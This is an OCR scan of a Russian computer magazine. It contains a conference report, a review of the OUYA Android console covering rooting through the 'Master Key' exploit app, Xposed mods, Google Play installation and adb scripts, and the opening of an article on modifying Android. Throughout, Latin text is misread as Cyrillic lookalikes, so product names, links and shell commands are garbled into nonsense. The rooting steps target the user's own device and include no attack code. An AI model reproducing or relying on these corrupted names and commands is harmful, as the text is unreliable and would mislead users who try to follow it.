компьютерных систем Санкт- 
Петербургского политехниче- 
ского университета 


Доклад «Использование аппаратной вир- 
туализации для мониторинга работы системы 
с внешними устройствами» стал «изюминкой» 
для любителей низкоуровневого программи- 
рования, благодаря возможности изучить опыт 
создания гипервизора, контролирующего работу 
клавиатуры, мыши, оперативной памяти. 

Гости, жаждущие не только зрелищ, но и хле- 
ба, угощались апельсиновым соком с булочками, 
боролись за рисоварку, «взламывая» телеви- 
зор, а между делом угоняли друг у друга радио- 
управляемый танк, пытаясь сфотографировать 
его камерой элегантные ножки ведущей в самом 
удачном ракурсе. В итоге танк достался самому 
умелому хакеру, сделавшему лучший снимок! 


ТО ВЕСОМТ!МОЕО... 
Мы хотим сделать МеоОЧЕЗТ-2014 еще инте- 
реснее и отразить стремительную динамику 
возникновения новых задач кибербезопасности 
не на словах, а продемонстрировав их в реале 
на специально развернутых стендах, чтобы зри- 
тели могли все пощупать собственными руками. 
Задания МеоОЧЕЗТ-2014 затронут как фунда- 
ментальные, так и самые актуальные и нетри- 
виальные проблемы кибербезопасности, а его 
участники продемонстрируют, что они запросто 
могут справиться с абсолютно любыми трудно- 
стями! 

Организаторы ждут всех на МеоОЧЕЗ$Т-2014! 
Следите за объявлениями на пеодие$1.ги. 2= 


_ мааавышилаь ы в. 


Взломай телевизор — получи рисоварку )) 


Тотсамый доклад об ужасах телевизоров ирисоварок 
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НОВАЯ ЛЕГЕНДА 


Игровая консоль для настоящих гиков 


В прошлом году Джулия Урман запустила кампанию по сбору средств на раз- 
работку игровой консоли, основанной на чипе ММПЛА Теога 3 и операционной 
системе Апаго. Нужная сумма в размере 950 тысяч долларов была получена 
всего за восемь часов, а за все время существования кампании разработчики 


собрали 8,5 миллиона долларов, став одними из самых успешных на Кск$ацег. 


Несколько месяцев назад ОЦ\МА поступила в продажу, и теперь мы можем оце- 


нить, стоила ли овчинка выделки. 


ФЕНОМЕН ОЦУА 

С самого момента своего появления на Кск<ацЩег проект ОЦ\УА 
выглядел очень противоречиво. Игровая консоль, основан- 
ная на мобильном чипе с мобильной операционной системой 
на борту, хоть и должна была стоить всего 99 долларов, но вы- 
глядела странно на фоне своих больших собратьев в лице Р$З 
и Хбох 360. Маленькая коробочка, оснащенная 500-мегагерцо- 
вым видеочипом, просто не могла составить им конкуренцию, 
из-за чего смысл существования консоли казался вовсе не оче- 
видным. 

Суть и прелесть ОЧУА можно было оценить, лишь внима- 
тельно прочитав довольно длинное описание проекта. В нем, 
в частности, было много слов об открытости, свободной си- 
стеме распространения игр, независимости от издателей и так 
далее. По сути, авторы проекта предлагали продукт, реально 
созданный для пользователей и разработчиков игр, а не оче- 
редную черную коробку, в которой ничего нельзя изменить. 

В этом смысле ОЦМА была чем-то совершенно новым и све- 
жим. Она была привлекательна для всех. Игроки получали до- 
ступ к онлайн-репозиторию игр, каждую из которых можно 
опробовать абсолютно бесплатно, а в случае чего скопировать 
уже имеющуюся на смартфоне игру в приставку. Независимые 
разработчики получали бесплатную площадку для распро- 
странения своих творений, пусть даже самых концептуальных 
и странных, а гики и все, кто любит поковыряться в железе, — 
открытую систему, причем настолько, что не просто можно за- 
менить или модифицировать прошивку без потери гарантии, 
а приставку в буквальном смысле можно воссоздать, скачав 
из Сети схемы для 3ЗО-принтера. 

Все это сделало ОЦМА чрезвычайно популярным проектом, 
которому пророчили не просто большое будущее, но чуть ли 
не революцию в мире домашних мультимедиасистем. И вот 25 
июня первая партия консоли поступила в продажу. Но действи- 
тельно ли она так революционна и открыта? Попробуем разо- 
браться. 


ПОКУПКАИ ПЕРВЫЕ ВПЕЧАТЛЕНИЯ 

В обычном магазине купить ОЧУА нельзя. И дело тут вовсе 
не в России, а в самой модели распространения консоли, 
которая предполагает продажу только через сайт оцуа.1м, 
Ата7оп и еще несколько порталов. Я сделал предзаказ ОЧУА 
еще в феврале на официальном сайте, заплатив за саму при- 
ставку 99 долларов плюс 20 за доставку, что, кстати, весьма 
экономно. За дополнительные 50 баксов можно было заказать 
также второй контроллер, но в нем просто не было необходи- 
мости. 

В местное почтовое отделение консоль пришла только в на- 
чале августа («Почта России», как всегда, на высоте). Сама при- 
ставка была спрятана в небольшой черной картонной коробке, 
в которой также находилась большая пластиковая табличка 
с надписью белым по красному «Спасибо за то, что верили» 
(ТПапк уоиц Тог Бейемпоа), намекающая то ли на поддержку кам- 
пании на КскЗацег, то ли на предзаказ. 


Кроме таблички, в коробке также находилась сама консоль 
размером с кубик Рубика, контроллер, НОМ!-кабель, кабель 
питания, две батарейки Бигасе! для контроллера и простень- 
кое руководство пользователя. Консоль оказалась просто се- 
рым кубом со скругленными снизу углами, кнопкой включения 
сверху, разными портами сбоку и отверстиями для вентиляции 
снизу (внутри кубика есть вентилятор, а сама она стоит на не- 
больших ножках, так что воздух спокойно проходит в щель). 

Сбоку располагаются порты для кабеля питания, НОМ, УЗВ 
2.0, писгоЦЗВ и порт Елете для тех, у кого нет точки досту- 
па М/-Е!. Физически все эти порты размещены на одной плате 
с вентилятором, которую легко извлечь из куба, открутив че- 
тыре болта сверху, и поместить в любой другой корпус, как это 
делают некоторые энтузиасты. Таким же образом можно поме- 
нять вентилятор, если штатный выйдет из строя. 

Контроллер на первый взгляд здесь вполне стандартный. 
Обычный «рогатый» джойстик с крестовиной, четырьмя кноп- 
ками, двумя аналоговыми стиками, четырьмя клавишами 
на верхнем торце и кнопкой включения посередине (которая од- 
новременно служит и для перехода на главный экран, и для от- 
крытия меню в играх и приложениях). Батарейки находятся 
В «рогах», по одной на каждый, благодаря чему джойстик пра- 
вильно уравновешен и очень удобно лежит в руках. Заглушки, 
которые открывают доступ к батарейкам, крепятся на магнитах, 
ане на пластиковых крючках, поэтому при замене можно не бо- 
яться что-нибудь сломать. В центральной черной части распо- 
лагается неболышой тачпад, который тут явно сделан для со- 
вместимости с Апагоа-приложениями; стандартный интерфейс 
и родные игры полностью управляются крестовиной и стиком. 

Подключить консоль очень просто: кабель питания — в при- 
ставку, НОМ!-кабель — в телевизор, далее кнопка включения 
сверху. 


ПЕРВОЕ ВКЛЮЧЕНИЕИ МЕСТНЫЙ АМОВО!О 

Первое, что видишь после включения консоли, — это инструк- 
ция по подключению джойстика, которая состоит всего из двух 
пунктов: нажать кнопку включения и удерживать кнопку «и», 
пока не загорится левый светодиод. Так происходит Вищоо!- 
пайринг, длительность которого не дольше секунды. Затем 
ОЧУА предлагает подключиться к \ММ-Н-сети, для чего достаточ- 
но выбрать нужный З$10 из списка и ввести пароль. Печатать 
его придется на местной клавиатуре, передвигая курсор с по- 
мощью стика или крестовины. Утомительно, но терпимо. 


4.5 
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Евгений Зобнин 
апаго4$гее{. пе! 


АППАРАТНАЯ 
НАЧИНКА 


ЗоС: ММОЛА Теога 3 
Т3ЗЗ-Р-АЗ 
Процессор: Оцад- 
Соге 1,7 ГГц Соцех А9 
(АВМУТ-А) 

Графика: ММА 
СеРогсе ЧЁР 520 МГц 
Память: 8 Гб 

ОЗУ: 1 Гб 
Беспроводные тех- 
нологии: Вивос{пй 1Е 
4.0, 802.116/9/п 
Порты: псгоЦЗВ, 
О5ЗВ 2.0, НОМ! 1.4 
(720р/1080р), Епете 
10/100 


ШМЕО 


Официально игры 
от СбатаоН (Моадет 
Сотра+т 4, напри- 
мер) совместимы 
только с джойстиками 
МОСА. Но игру легко 
обмануть и заставить 
работать с контрол- 
лером ОЦ\А, вставив 
в ЧУЗВ-порт консоли 
мышь или клавиатуру. 


Уже сейчас видно, что ОПУА — это дей- 
ствительно народная консоль, которая 
пользуется популярностью среди множе- 


ства людей по всему миру 


46 Х-МобБе 


ТНАМК УОЧ 
ГОК ВЕМЕМИМС. 


Невзрачная коробка ОЧУА 


Спасибо зато, что верили 
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После открытия 


Содержимоекоробки 


Джойстик счетырьмя светодиодами и тачпадом 


Далее ОЦ\УА проверит наличие обновлений и, если оно бу- 
дет найдено, сразу начнет его скачивать. Обновления здесь 
распространяются в стандартных для Апаго4 ир-файлах, по- 
этому после завершения скачивания происходит перезагруз- 
ка в местный Весоуегу, который автоматически устанавливает 
прошивку. После следующей загрузки ОЦ\УА предложит заре- 
гистрировать аккаунт и указать сведения о кредитной карте. 
Причем номер кредитки нужно вводить обязательно — очень 
странно, учитывая, что для ОЦУА полно бесплатных игр и прило- 
жений. С другой стороны, номер не проверяется, так что для на- 
чала можно ввести рандомные данные. 

Это все. Теперь на экране должен появиться «рабочий стол» 
ОЧ\А, который в последней доступной мне прошивке разделен 
на две части. Сверху располагаются последнее запущенное 
приложение и рекомендуемые игры, а в нижней — четыре пун- 
кта: Р!ау, О!5соуег, Маке и Мапасще. Первый пункт открывает окно 
со списком установленных игр, второй служит для поиска игр 
и приложений, третий раздел предназначен для разработчиков. 


Четыре порта сбоку 


Батарейки в «рогах» 


ШМЕО 


Перед сдачей этой 
статьи тестовая 
сборка ХВМС стала 
доступна в магазине 
ОЧУА. Таким обра- 
зом, теперь игровую 
консоль можно легко 
превратить в мощный 
медиацентр. 


Для ОПУА, помимо неиграбельного хлама, 
сделанного явно для экзамена по информа- 
тике, уже есть и общепризнанные хиты 


Подключенная и работающая 


г 79? 


То рай усиг соейтовег: Ргезз алб Нок Че @) БийЗоп иле огфу ле птыбеве ги [ЕТ аге Йазейта. Чел 4 до. 


Стартовый экран 


В нем размещаются автоматически загруженные с помощью 
ЗОК сборки игр, а также список вручную установленных прило- 
жений. 

Последний пункт — это, по сути, меню настроек. Здесь 
можно изменить данные аккаунта, добавить или удалить кре- 
дитки, изменить язык (русского нет), проверить на обновления 
или открыть родное, но очень урезанное окно настроек Апаго. 
Оно пригодится, когда придется иметь дело со сторонними 
приложениями, которые почему-то нельзя удалить через род- 
ной интерфейс ОЧЦ\А. 


ИГРЫ, ПРИЛОЖЕНИЯ И ПРОИЗВОДИТЕЛЬНОСТЬ 
Сомневаюсь, что многие из читателей будут использовать при- 
ставку по прямому назначению, поэтому об играх скажу кратко. 

На момент написания этих строк для ОЦУА насчитывалось около 

400 игр, среди которых удалось отыскать: 

1. Общепризнанные хиты: Зопю 4 ер!5оае 2, Зпадомодип, Нпа! 
Ратазу 3, Сапара!, [се Ваде, Ва Чат, Еуас, а также потряса- 
ющие Вага’$ Тае и Зте Мога. 

2. 10-20 интересных инди-игр различных независимых раз- 

работчиков. 

Огромное количество неиграбельного хлама, сделанного 

для экзамена по информатике. 


о 


Доступны также эмуляторы для всех известных приставок 
прошлого, включая Оепау, Зирег Мищепао, Зеда Меда Опуе, 
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РА егорпт 


=фипеп 


Домашний экран 


РауЗайоп, Митепао 64 и других, так что те, кто хочет предаться 
ностальгии, найдут здесь все необходимое. На приставку так- 
же можно залить любую Апаго9-игру, скачав ее из интернета 
с помощью встроенного браузера, залив, используя УЗВ-шнур, 
либо установив на приставку Сооде Р!зу. Главное, чтобы игра 
поддерживала джойстик. 

В местном маркете можно найти и несколько приложений, 
включая файловый менеджер ЕйеРмт, медиаплеер УМС, пле- 
ер интернет-радио Типет Вааю, чат Егепоее и даже караоке 
РоигКагаоке. Другими словами, даже без лишних манипуляций 
ОЦ\А практически из коробки неплохой медиаплеер с аппарат- 
ным декодером Ги! НО видео. Но ввиду ограниченного объема 
внутренней памяти придется обзавестись еще и емкой флеш- 
кой или внешним жестким диском (правда, отформатировать 
его нужно в ЕАТЗ2 либо ех\,, ну или получить гос? и установить 
МТЕ$-драйвер от Рагадоп). 


СТОРОННИЕ ПРИЛОЖЕНИЯ И СООСЕЕ РЕАУ 

Одна из самых привлекательных черт ОЦУА — это возможность 

без всяких хаков и получения гос запустить практически любое 

Апагоа-приложение. Для этого достаточно скачать программу 

откуда угодно, закинуть с помощью УЗВ-кабеля, а затем уста- 

новить через файловый менеджер. Иконка приложения появит- 
ся в меню Маке. 

Второй способ — это установить один из сторонних мар- 
кетов, например Атагхоп Арр Зюге или Уапаех Зоге. Они оба 
совместимы с ОЦУА, однако большинству читателей, скорее 
всего, не подойдут из-за необходимости повторной оплаты 
приложения, которое уже было куплено в Сооде Р!зу. А послед- 
ний, как известно, должен быть установлен как системное при- 
ложение, для чего нужен гос4. 

К счастью, получить гоо{ в ОЦМА и, как следствие, устано- 
вить СооЧе Рау, очень просто. Даже самую последнюю про- 
шивку можно легко поломать с помощью приложения Воо1 Му 
ОЦ\А (чоо.9/РЗЬмОа), которое использует нашумевший экс- 
плойт Мачег Кеу, позволяющий устанавливать хакнутые си- 
стемные приложения. Все, что нужно сделать, — это открыть 
браузер ОЦМА (находится в меню Маке), перейти на страницу 
приложения, скачать его и установить с помощью файлового 
менеджера. После запуска на экране появится кнопка З4ай 
Вост. 

Чтобы установить сам Сооче Рау, придется немного пово- 
зиться. Дело втом, что он несовместим с ОЦМА, но может на ней 
работать благодаря специальному модулю (патчу), который 
можно активировать с помощью фреймворка Хрозеч. Этот патч 
включен в состав целой коллекции твиков под названием Моа 
Сойесйоп Рог ОЦУА, ее мы должны установить перед Сооде 
Рау. В результате вся цепочка действий по активации Сооде 
Р!ау в ОЦМА будет выглядеть так: 

1. Получаем гос\. 

2. Устанавливаем фреймворк Хрозеа отсюда: чоо.9/ММм/ 9, 
запускаем, нажимаем кнопку тЗа!/Уразе и перезагружа- 
ем приставку. 

3. Устанавливаем Мода СоЙесйоп отсюда: аоо.а/рЕЙЗЬ, запу- 
скаем, нажимаем Оп напротив Соое Р!ау З{оге Мод и на- 
жимаем пза! Р!ау Зтоге. 


Зте Мога 


47 


ЪТА-АСРЕЕОВ 


+ 


ЫЕНЕЫ 
ПЕСЯ ВМА 


. ` 


пп» + * 


Местный маркет 


У\УАВММС 


При активации опции 
5 &Мод$ Ргезегуег 
в Мод Сойеснолп и по- 
следующем обновлении 
нужно заранее подклю- 
чить к ОЦУА клавиатуру, 
так как после переза- 
грузки СоскмогкМод 
потребует подтвердить 
установку обновления 
снарушенной цифровой 
подписью, а джойстик 
в это время работать 
не будет. 


МЕО 


Для ОЦМА уже есть 
полностью работоспо- 
собный СуаподептпМосч, 

который поддер- 
живает и джойстик. 
Скачать можно здесь: 
900.9ИЕОр3З\Ч. 
Устанавливается с по- 
мощью перезагрузки 
в Весоуегу либо с по- 
мощью приложений 
ВОМ Мападег или 
Ащо Назпег. 


4. Запускаем Хрозеа и на вкладке Модие$ ставим галочку на- 


против Моча Со!еспоп Рог Оцуа. Перезагружаем приставку. 
5. Запускаем Сооде Рау и вводим данные аккаунта. 


Обрати внимание, что в коллекции модов есть еще четыре 
интересных пункта: 

. 50 & Мосд$ Ргезегуег. Очень полезный хак, который позво- 
ляет сохранить гоо{ и боод!е Р!ау после автоматического 
обновления прошивки. Требует установки С!осКмогкКМоа 
с помощью соответствующей кнопки (перед этим сле- 
дует установить ВизуВох). Если кнопка не сработала, 
то СоскмогкКМоЯ можно установить вручную, а после 
этого активировать данную опцию (как это сделать, рас- 
сказано во врезке «Устанавливаем СоскмогкКМоч вруч- 
ную»). 

. ОзаЫе Ащо Урадате. Не менее полезный хак, который от- 
ключает функцию автоматического обновления. Нужен 
потому, что обновление ОЦЧУА невозможно остановить; 
если приставка обнаружила новую прошивку, она будет 
пытаться скачать ее и установить до бесконечности, даже 
если это невозможно сделать по техническим причинам. 
После отключения обновление можно проверить вручную 
в меню: Мападе -› Зу$ет -› Зу$ет Ураа{е$. 


УСТАНАВЛИВАЕМ 
СтОСКМУОВКМоОО ВРУЧНУЮ 


Проще всего установить СоскмогкМоа, используя 
АОВ. Если ОЧУА рутована и на нее уже установлен 
Сооде Ру, то достаточно установить и запустить 
на приставке \МЛЕ! АБВ, а затем подключиться к вы- 
веденному на экран адресу: 


$ ааб соппесЕ 192.168.0.104:5555 


Далее берем с диска, прилагаемого к журналу, 
файлы ОцчуаС\М/Мгесоуегуб.0.3.2. итд и СУИМРаз$ИЗсипру. 
эй, копируем их на приставку: 


$ ааб ризН ОцуаСИМгесоуегуб.0.3.2.1мв ‹- 
/засага/ 
$ ааб ризН СиМЕ1а$И$сгаре.$И /засага/ 


Прошиваем: 


ааб °Пе11 

5и 

с /дафа/тедта 

$И СИМЕ1а$И$сг1ре.$ И 


9 59 59 6А 


„фипеп 
Воока ЗВаае - $00 


21.13 


Воока ЗВаде - $010 Сиу 
16ВТ.ЕМ САЕЕ 


Интернет-радио Типет 


МЕО 


В местном марке- 
те есть несколько 
бесплатных игр 
знаменитого ин- 
ди-разработчика 
Терри Кавана (Теггу 
Сауапаодп), однако 
его хитовый Зирег 
Нехадоп придется 
ставить из Рау З{оге, 
благо игра поддержи- 
вает джойстик. 


Х-МоБПе 


Вез{е4 


ВаЧо Весога - Весога СВ-Ошщ 


[0] СШощ 


1.ЕМ - СЫ О\ Гоиупде 
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Вго\мизег 


МЕЕО НЕЁР СЕТТИМС $ТАКТЕО? 


ГАУМСН ОЕТАН.$ 


Соод!е Р!ау и сторонние приложения 


. Гогсе НОМ! Везо®юп. Хак, позволяющий выбрать разреше- 
ние: 720р или 1080р. Консоль всегда выбирает максималь- 
но возможное разрешение, но если ты хочешь получить 
выигрыш в производительности, то можешь принудительно 
его снизить. Результатом станет более плавная работа ин- 
терфейса и возросший ЕР$ в играх, однако я бы не стал то- 
ропиться с изменением этой настройки, не потестив игры; 
в моем случае даже такие тяжеловесы, как Зте Мога, шли 
в Ри! НО без каких-либо провалов ЕР5. 

. РхОмуегхсап. Фикс редкого бага с неправильным масштаби- 
рованием изображения. Если картинка выходит за преде- 
лы экрана телевизора, то стоит поиграться со значениями 
в окне ввода справа (от 0.00 до 0.20). 


УДАЛЕННОЕ УПРАВЛЕНИЕ 

ОЦ\А поддерживает одновременную работу с четырьмя джой- 
стиками, однако в комплекте с ней идет только один. Кроме 
игр, его можно использовать также для навигации по системе 
меню, набора текста и любых других задач, включая управле- 
ние курсором с помощью тачпада. Он действительно удобен, 
но это далеко не единственный способ управления приставкой, 
а если речь идет о превращении ОЧ\А в мультимедиацентр, 
то и не лучший. 

Одним из вариантов удаленного управления могут быть 
клавиатура и мышь. В приставке имеется два УЗВ-порта, один 
из которых тгсго, и поддержка УЗВ-хабов, так что ОЦМА можно 
легко превратить в этакий мини-комп, особенно если допол- 
нительно установить из маркета более привычный домашний 
экран, вроде Арех 1аипспег или Моуа Ёаипспег, и нормальный 
браузер. 

Еще один вариант — это всевозможные портативные 
Вучеюоо-клавиатуры, которые за копейки продаются в Китае 


РАСШИРЯЕМ ОБЪЕМ ВНУТРЕННЕЙ ПАМЯТИ 


Объем внутренней памяти ОЦ\МА составляет всего 8 Гб, так что после установ- 
ки нескольких тяжеловесных приложений память может просто закончиться. 
Решить эту проблему можно с помощью создания флешки с двумя разделами, 
второй раздел отформатировать в файловую систему ехМ. После подключения 
такой флешки в приставку следует ее смонтировать, набрав в консоли или АВВ 


такие команды: 


$ зи 


# шКа1г /аафа/заех*2 


+ тоипЕ -Е ехЕ4 /аеу/Б1ТосКк/мо1а/8\:2 /аафа/заехЕ2 


Далее достаточно установить и запустить приложение Ипк2$0 из бооде 
Рау, и ты получишь возможность переместить любое приложение на флешку 
(следует использовать кнопку ИпК{о 50, ане Моуе тю $0). Монтировать раздел 
придется вручную после каждой перезагрузки. 


и предназначены для использования в кооперации с так назы- 
ваемыми мини-ПК на базе того же Апагоа. С ОЦ\МА они работа- 
ют не хуже, чем с любым другим Апаго-девайсом. Одна про- 
блема — английская раскладка. 

Также можно использовать удаленные пульты для смарт- 
фонов, такие как ВТСоп!о! или ОгоМо. Первый работает 
по Виеоо\{1 и включает в себя несколько разных наборов джой- 
стиков и пультов. Сильная черта приложения — возможность 
создавать свои собственные джойстики с произвольным набо- 
ром кнопок, вплоть до полноценной ОМ/ЕВАТУ-клавиатуры. Сла- 
бая — идиотская система пайринга, которая срабатывает через 
раз и перехватывает контроль над клавиатурой. 

ОгоаМфе, напротив, работает по \М-Р!, что плохо — мо- 
гут появляться задержки и лаги (при просмотре Ри! НО видео 
по сети, например). Зато в составе этого приложения есть все 
необходимые инструменты управления, начиная от тачпада 
и клавиатуры и заканчивая джойстиком. Два очевидных мину- 
са: платный сервер (1 доллар) и необходимость получения гос\. 
Огромный плюс: возможность использовать джойстик для аб- 
солютно любых игр, даже тех, которые поддерживают только 
сенсорное управление (для этого придется скачать или создать 
мэппинг кнопок к точкам на экране). 

На ОЧУА без проблем работает СпеарСаз${ — приложе- 
ние, которое позволяет превратить любое Апагоа-устройство 
в СПготеса$-совместимый девайс. Работает это так: уста- 
навливаешь СПеарСаз${ на ОЦМА, запускаешь, нажимаешь Зач 
Зегмсе, далее берешь в руки смартфон, выбираешь в ютубе 
ролик и нажимаешь кнопку в форме прямоугольника вверху, 
далее выбираешь в списке Оцуа Сопз@е, и ролик начинает про- 
игрываться на экране телевизора, а проматывать его и ставить 
на паузу можно с помощью смартфона. Это очень удобно, од- 
нако поддерживаются пока только УочцТирбе и стандартный ви- 
деоплеер. 

С большого компа рулить девайсом можно с помощью АВВ, 
протокола для отладки Апагоа. Для этого достаточно устано- 
вить из маркета приложение МЛЕ! АОВ, запустить его, а на ма- 
шину скачать АОВ-клиент. Клиент консольный, поэтому его 
очень удобно использовать в разных скриптах или ра{-файлах, 
если речь идет о ММп4ом5. 


МАСТЕР-КЛАССАОВ 

На моей домашней машине стоит Шпих, поэтому я написал не- 
сколько скриптов для управления ОЦМА с помощью АБВ. Пер- 
вый просто перебирает пять-шесть адресов в локальной сети, 
пытаясь найти Апаго!-устройство и подключиться к нему: 


$ м1 --/61п/асоппесе . $В 

#1 /61"/$И 

МЕТ=192.168.0 

К11]а11 ааь 

ФРог 1 11 100 1901 102 103 104 105; ао 
аа соппесе ${МЕТ}.$1 

аопе 


Может быть, проще было бы настроить привязку 1Р-адреса 
к МАС’у ОЦ\УА и не париться с перебором, но мой вариант хо- 
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рош тем, что позволяет подключиться к любому устройству, 
ане только к ОЦМА. 
Второй скрипт нужен для удаленного ввода текста: 


$ м1 -/61п/а1приЕ. $И 

#1! /Б1п/ $ И 

ааь °Не11 1приф {ехЕ $1 

ааб °Пе11 1приф Кеуеуеп{ 66 


Достаточно выбрать поле ввода с помощью джойстика, а за- 
тем набрать 


$ а1при*.$5! "Я ввел этот текст" 


Этот скрипт очень удобно использовать для ввода разного 
рода логинов, паролей и адресов сайтов. Однако последние на- 
много удобнее вводить с помощью такого скрипта: 


$ м1 -/61п/аореп. $! 

#1! /Б1тп/ $ И 

ааб °Пе11 ат $ФагЕ -а += 
апаго14.1п%еп*.ас%1оп.\ТЕМ -а $1 


Он открывает указанный адрес прямо в браузере, что осо- 
бенно полезно, когда надо выкачать какой-то файл из интернета 
прямо в консоль. 

Ну и последний скрипт я использую для снятия скриншотов 
(в том числе для этой статьи): 


Мода СоНесвоп Рог 
Очцуа: набор из пяти 
мастхэв-твиков 


$ м1 -/61п/азсгееп.$Н 

#1! /Б1п/ $ И 

ааь °Не11 °сгеепсар /59сага/$1 
ааб ри11 /5асага/$1 

ааб °Пе11 гм /$9сага/$1 


Использовать так: 


$ азсгееп.$5И скриншот. рпе 


Есть и несколько других полезных команд. Например: 


// Перезагрузка в Весоуегу 

$ ааб гебоот гесоуегу 

// Нажатие кнопки Ромег (выключение/включение) 
$ ааб $зНе11 1приф КеуеуепЕ 26 

// Установка пакета 

$ ааб 1п$%а11 пакет.арк 

// Получение файлов с устройства 

$ ааб ри11 /засага/файл 


МЕДИАЦЕНТР 


Одно из очевидных применений ОЦУА — это создание домашнего медиа- 
центра. Для этого у консоли есть все необходимое, за исключением емкого 
хранилища видео- и аудиофайлов. Одним из вариантов решения этой про- 
блемы станет покупка МА$ или самостоятельная сборка файлового хранили- 
ща с сервером иРпР/РЕМА, который позволит автоматически подключаться 
к хранилищу и играть с него файлы. Поддержка ОМА есть в МЕС и ХВМС, ко- 
торые доступны в маркете ОЦМА. 

Второй вариант — это подключение хранилища к самой приставке с по- 
мощью ИУ5В-порта. Можно использовать как емкую флешку, так и внешние 
жесткие диски, включая 3,5-дюймовые кейсы с переходниками ЗАТА — 
($В. Даже дешевый кейс для жесткого диска китайского производства 
способен обеспечить скорость чтения-записи в 20 Мб/с, чего с лихвой 
хватит для скачивания файлов с помощью торрент-клиента и проигрывания 
РУЙ НО видео. 

В качестве файловой системы рекомендую использовать ГАТ, однако 
если такой возможности нет, то МТЕ$ или ехМ. Диск, отформатированный 
в МТР$, будет автоматически смонтирован при подключении к каталогу /тпИ 
избапуе, но только в режиме для чтения. Чтобы получить возможность запи- 


ПМЕО 


Варианты замены 
рабочего стола: Зтай 
Е аипспег, ТМЁаипспег, 

Т\ Вох Ёаипсйег. 


49 


МЕО 


У ОМА разблокированный загрузчик, поэтому она полностью открыта 

для перепрошивки и разных хаков. Например, подключив ОМА кабелем 

к ПК, ее можно заставить загрузить СоскмогкКМоа, даже не устанавливая 
его: ааб герооф Боо{1Тоадег, Газ{Боо{ Бооф ОцуаСИМгесоуегуб.е0.3.2.1тв. 


$! Мод Сойеспоп Рог Оцуа Бу ММопдегЕкт@ХОА 


Сооде Р|!ау З4оге Мод 


СИсК "па! Р!ау $1оге" И уои п”: Вауе И уе. Иа! Рау Зюге 


ЗИ & Моа$ Ргезегуег 


СМ/М Весоуегу гедитеа, 
сйсК "/пз1а! СММ Весоуегу" (Бу пубоок4@ХОА) \о пзпа|. Иа С\М Весоуегу 


О15ае Ащо Урдае 


Уои сап сВескК ог ирда{е тапиаЙу т МАМАСЕ > ЗУЗТЕМ > ЗУЗТЕМ УРБАТЕ$ 


Рогсе НОМ! Везо|и{оп 


720р © 


Ах Оуегзсап 


Бе{аи! Зсае Ма! (_ 


1080р 


Сизют Зсае \а! (0.00-0.20) 0.0 Зе Ма! 


ВЫВОДЫ 

До ОЧУА я использовал в качестве медиаплеера китайский 
НОМ!-стик на Апагоа 4.1, о котором написал целую статью 
для одного из предыдущих выпусков журнала. Не скажу, 
что ОЦ\А уделывает китайского конкурента по всем фронтам, 
но она определенно больше подходит для любителей поко- 
выряться в прошивке и железе. С момента выпуска приставки 
прошло всего несколько месяцев, а ее уже успели кастомизи- 
ровать, портировать полноценный СуаподепМоа, придумали 
множество хаков и интернет-сайтов, посвященных исключи- 
тельно ОЦУА. 

Уже сейчас видно, что это действительно народная кон- 
соль, которая пользуется популярностью среди множества лю- 
дей. Да, это не конкурент Р!ау$З{айоп и ХБох, но это приставка, 
сделанная людьми и для людей, которой действительно при- 
ятно пользоваться и создатели которой всегда прислушивают- 
ся к юзерам. Разработчики уже объявили, что будут выпускать 
новую ОЧУ\УА каждый год с появлением обновленных чипов 
ММОТА Теога, и могу сказать наперед, что, если цена приставки 
не изменится, я с удовольствием приобрету себе обновленную 
версию. == 


си, придется использовать внешний МТЕ$ -драйвер, например Рагадоп МТЕЗ 
& НЕЗ+. ЕхЧ-разделы придется монтировать самостоятельно с помощью 
следующей команды: 


$ зи 
# тоипЕ -& /аеу/Б1Тоск/ааХхХ /тпЕ/изБаг1уе 


Чтобы не вводить команду после каждого включения консоли, можно 
установить из маркета и активировать приложение Упмегза!тк.а, а затем 
поместить указанную команду в файл /зучет/ас/тк.а/ежАтоиг. 

В качестве торрент-клиента лучше всего использовать {Тогге\. Это един- 
ственный полноценный клиент для Апагоа, сопоставимый по функциональ- 
ности с десктопными аналогами. Его бесплатная версия имеет ограничение 
в 250 Кб/с, для снятия которого придется заплатить 131 рубль. Это совсем 
недорого для приложения такого класса. Смотреть видео и слушать музыку 
удобнее всего в плеерах \1С и \Р!ауег. И тот и другой поддерживают прак- 
тически все существующие форматы и задействуют аппаратный декодер 
видео. 
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НА ПЕРЕХВАТ: 


Как кастомизировать Апаго4, не устанавливая патчи 


Базирующийся на ядре Ипих и открытый Апагога как будто создан для разных хаков и модифи- 
каций. За все время существования мобильной ОС на ее основе были созданы сотни кастомных 
прошивок, найдены десятки способов изменения ее внешнего вида и поведения, появилась 
функциональность, не предусмотренная Сооде. Однако получить нужные функции до недавнего 
времени можно было, лишь перепрошив устройство, что неудобно и в ряде случаев опасно. 


ВВЕДЕНИЕ, ИЛИ КАКОНИ ЭТО ДЕЛАЮТ 
Хакерам, модерам и прочим энтузиастам из- 
вестно несколько способов изменения внешнего 
вида, поведения и других параметров Апаго. 
Три наиболее популярных: 

1. Правка файлов —/зучет/НатемогК/Лтате- 
могК.|аг, /зует/Натемогк/НатемогК-гез.|аг 
и /зучет/арр/Зучет.арк, которые содер- 
жат описание интерфейса и ресурсы, нужные 
для его отображения. Редактируя эти файлы, 
можно изменить внешний вид практически лю- 
бого компонента интерфейса, начиная от раз- 
мера кнопок и заканчивая цветом надписей. 

2. Правка исходных текстов компонентов си- 
стемы. С помощью этого способа можно из- 
менить что угодно — от реакции на нажатие 
кнопок громкости до полного изменения по- 
ведения системы. Другими словами, можно 
переделать ОС под себя. 

3. Декомпиляция и правка системных прило- 
жений, не имеющих исходных текстов. Таким 
образом можно изменить фирменные прило- 
жения СооЧе, такие как Сооде Р!ау и Стай, 
исходники которых поисковый гигант не вы- 
кладывает. 


Проблема всех этих способов в том, что они 
не позволяют менять Апаго!А «на живую». Нель- 
зя взять со смартфона файл /зуЗчет/Нате\могк/ 
Натемогк-гез$.аг, исправить его и скопировать 
обратно в систему. Технически в этом нет ничего 
сложного, достаточно получить гоот, перемонти- 
ровать /зует в режиме чтения-записи и выпол- 
нить необходимые действия, однако изменения 
не вступят в силу до перезагрузки, да и загрузится 
ли система с новым файлом — болышой вопрос. 

Кроме того, изменив системный компонент, 
нельзя быть уверенным, что модификация зара- 
ботает на другом смартфоне, даже если на нем 
установлена та же версия системы. Аесли версии 
различаются, то надежды нет совсем. В некото- 
рых случаях модификацию вообще не удастся 
установить, так как загрузчик может быть залочен, 
а системный раздел защищен от записи (привет 
МоогоМа). 

Из-за этих ограничений разработчики вы- 
пускают модификации либо в составе готовых 
прошивок, либо в виде обновлений, предназна- 
ченных для определенных версий ОС и моделей 


